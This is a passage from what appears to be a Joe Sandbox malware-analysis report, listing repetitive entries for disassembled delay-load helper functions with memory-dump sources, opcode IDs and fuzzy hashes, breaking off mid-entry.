                                                                                                  Function 0091E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 2c909e2fa2fdca16e50d4c27b8e8b3729e2c57e08bb737752bc39cd2decba25b
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 2c909e2fa2fdca16e50d4c27b8e8b3729e2c57e08bb737752bc39cd2decba25b
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 671c13707842423eb599007def84c7a81d418b91874dda2c799a908a6873e4d0
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 671c13707842423eb599007def84c7a81d418b91874dda2c799a908a6873e4d0
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: f171abd8aa34ca4ebb1ac627e97d2f3c0cd90de209824c0c7656ea32157bead6
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: f171abd8aa34ca4ebb1ac627e97d2f3c0cd90de209824c0c7656ea32157bead6
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: df0071db2916c9b39f20f058f50981ac7d80b96ce8a8deb40b4408dcf93dc5d2
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: df0071db2916c9b39f20f058f50981ac7d80b96ce8a8deb40b4408dcf93dc5d2
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 509a2762673aa7d27e45267166cc5b0d48286efcc72216fd131af4cd673d3acd
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 509a2762673aa7d27e45267166cc5b0d48286efcc72216fd131af4cd673d3acd
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: ee9bab09cfa619d8f1d6490e21d22ba10b9edcdd46088eb0739e02bd439b525f
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: ee9bab09cfa619d8f1d6490e21d22ba10b9edcdd46088eb0739e02bd439b525f
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: f123e20cabcf0ab6f379d92443693108b682c5251cfc14c26107a847770f9118
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: f123e20cabcf0ab6f379d92443693108b682c5251cfc14c26107a847770f9118
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 96c2d16a36afd9bfcadfbe39356eb7461d4ef3fc22d9353e02390356a920d9b4
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 96c2d16a36afd9bfcadfbe39356eb7461d4ef3fc22d9353e02390356a920d9b4
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 6db2ccb2c9010a980cc9e2e0f7f2cab4d6ff1d719cf8a600da2a9293db66d366
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 6db2ccb2c9010a980cc9e2e0f7f2cab4d6ff1d719cf8a600da2a9293db66d366
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 869717c3fab26352077c513ec985c6596ed7de2e5c5b90d95046f78cf28d5585
                                                                                                  • Instruction ID: 4ab6c4354fa60ee8d0f0c0aafdc9ea5f7d0f3f37e8a3ba589a9469897d442714
                                                                                                  • Opcode Fuzzy Hash: 869717c3fab26352077c513ec985c6596ed7de2e5c5b90d95046f78cf28d5585
                                                                                                  • Instruction Fuzzy Hash: 5CA011E23AC00ABC300822222C0ACBB022CE8C0B20330882EFC03C0080A88028822830
                                                                                                  Function 0091E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 3bd4d69905668488fd14b7332fefc416c84d4e7ef9e58483a78c03a44f04e4b9
                                                                                                  • Instruction ID: fdbd7c75ef314d2478407ec5e952ed0cb60dfbd3ccb1715bb756f2ee87dff40e
                                                                                                  • Opcode Fuzzy Hash: 3bd4d69905668488fd14b7332fefc416c84d4e7ef9e58483a78c03a44f04e4b9
                                                                                                  • Instruction Fuzzy Hash: 22A001E63A956A7D310866516D07DBB122DC8C1B29730996EFC25A5485AC8418861973
                                                                                                  Function 0091E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: da3fb50241cc7e66e6639fb0cdce2575ee86d9d4a6583085dd0ee279eb00ec01
                                                                                                  • Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
                                                                                                  • Opcode Fuzzy Hash: da3fb50241cc7e66e6639fb0cdce2575ee86d9d4a6583085dd0ee279eb00ec01
                                                                                                  • Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
                                                                                                  Function 0091E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 09f1b4acc7138acf06f8b56cfa773423e9821006e4d9b4d0ac9a88f43a92824c
                                                                                                  • Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
                                                                                                  • Opcode Fuzzy Hash: 09f1b4acc7138acf06f8b56cfa773423e9821006e4d9b4d0ac9a88f43a92824c
                                                                                                  • Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
                                                                                                  Function 0091E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 87b043840bccf8d419c48135c9b91d602ea162d30e7752f025b60efd79ea1da3
